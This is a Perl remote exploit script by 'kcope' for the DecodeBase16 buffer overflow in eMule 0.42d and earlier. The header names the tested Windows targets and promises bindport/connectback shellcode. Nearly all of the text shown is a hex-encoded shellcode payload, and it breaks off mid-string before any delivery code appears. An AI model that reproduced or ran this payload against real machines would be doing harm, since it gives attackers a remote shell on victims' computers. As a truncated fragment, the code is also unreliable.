1 #!/usr/bin/perl
2 #
3 # eMule <= 0.42d Remote Exploit by kcope
4 #
5 # exploits the DecodeBase16 buffer overflow
6 # tested on WinXP SP1 / Win2k SP4
7 # bindport/connectback shellcode
8 #
9 # thanks Kostya Kortchinsky for his posting to bugtraq
10 #
11 # greetings to sander, blackzero, beginna, adize, A−cru and wY :p
12 # have fun!
13 #
14 # kcope, kingcope gmx net Apr 2004
15 #
16
17 use Socket;
18 use Getopt::Std;
19
20 # bindport shellcode (port 2004) thanks to metasploit
21 $sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x21\x39".
22 "\x11\x09\x83\xeb\xfc\xe2\xf4\xc9\x6f\x11\x09\x21\x6a\x44\x5f\x76".
23 "\xb2\x7d\x2d\x39\xb2\x54\x35\xaa\x6d\x14\x71\x20\xd3\x9a\x43\x39".
24 "\xb2\x4b\x29\x20\xd2\xf2\x3b\x68\xb2\x25\x82\x20\xd7\x20\xf6\xdd".
25 "\x08\xd1\xa5\x19\xd9\x65\x0e\xe0\xf6\x1c\x08\xe6\xd2\xe3\x32\x5d".
26 "\x1d\x05\x7c\xc0\xb2\x4b\x2d\x20\xd2\x77\x82\x2d\x72\x9a\x53\x3d".
27 "\x38\xfa\x82\x25\xb2\x10\xe1\xca\x3b\x20\xc9\x7e\x67\x4c\x52\xe3".
28 "\x31\x11\x57\x4b\x09\x48\x6d\xaa\x20\x9a\x52\x2d\xb2\x4a\x15\xaa".
29 "\x22\x9a\x52\x29\x6a\x79\x87\x6f\x37\xfd\xf6\xf7\xb0\xd6\x88\xcd".
30 "\x39\x10\x09\x21\x6e\x47\x5a\xa8\xdc\xf9\x2e\x21\x39\x11\x99\x20".
31 "\x39\x11\xbf\x38\x21\xf6\xad\x38\x49\xf8\xec\x68\xbf\x58\xad\x3b".
32 "\x49\xd6\xad\x8c\x17\xf8\xd0\x28\xcc\xbc\xc2\xcc\xc5\x2a\x5e\x72".
33 "\x0b\x4e\x3a\x13\x39\x4a\x84\x6a\x19\x40\xf6\xf6\xb0\xce\x80\xe2".
34 "\xb4\x64\x1d\x4b\x3e\x48\x58\x72\xc6\x25\x86\xde\x6c\x15\x50\xa8".
35 "\x3d\x9f\xeb\xd3\x12\x36\x5d\xde\x0e\xee\x5c\x11\x08\xd1\x59\x71".
36 "\x69\x41\x49\x71\x79\x41\xf6\x74\x15\x98\xce\x10\xe2\x42\x5a\x49".
37 "\x3b\x11\x0e\xf5\xb0\xf1\x63\x31\x69\x46\xf6\x74\x1d\x42\x5e\xde".
38 "\x6c\x39\x5a\x75\x6e\xee\x5c\x01\xb0\xd6\x61\x62\x74\x55\x09\xa8".
39 "\xda\x96\xf3\x10\xf9\x9c\x75\x05\x95\x7b\x1c\x78\xca\xba\x8e\xdb".
40 "\xba\xfd\x5d\xe7\x7d\x35\x19\x65\x5f\xd6\x4d\x05\x05\x10\x08\xa8".
41 "\x45\x35\x41\xa8\x45\x35\x45\xa8\x45\x35\x59\xac\x7d\x35\x19\x75".
42 "\x69\x40\x58\x70\x78\x40\x40\x70\x68\x42\x58\xde\x4c\x11\x61\x5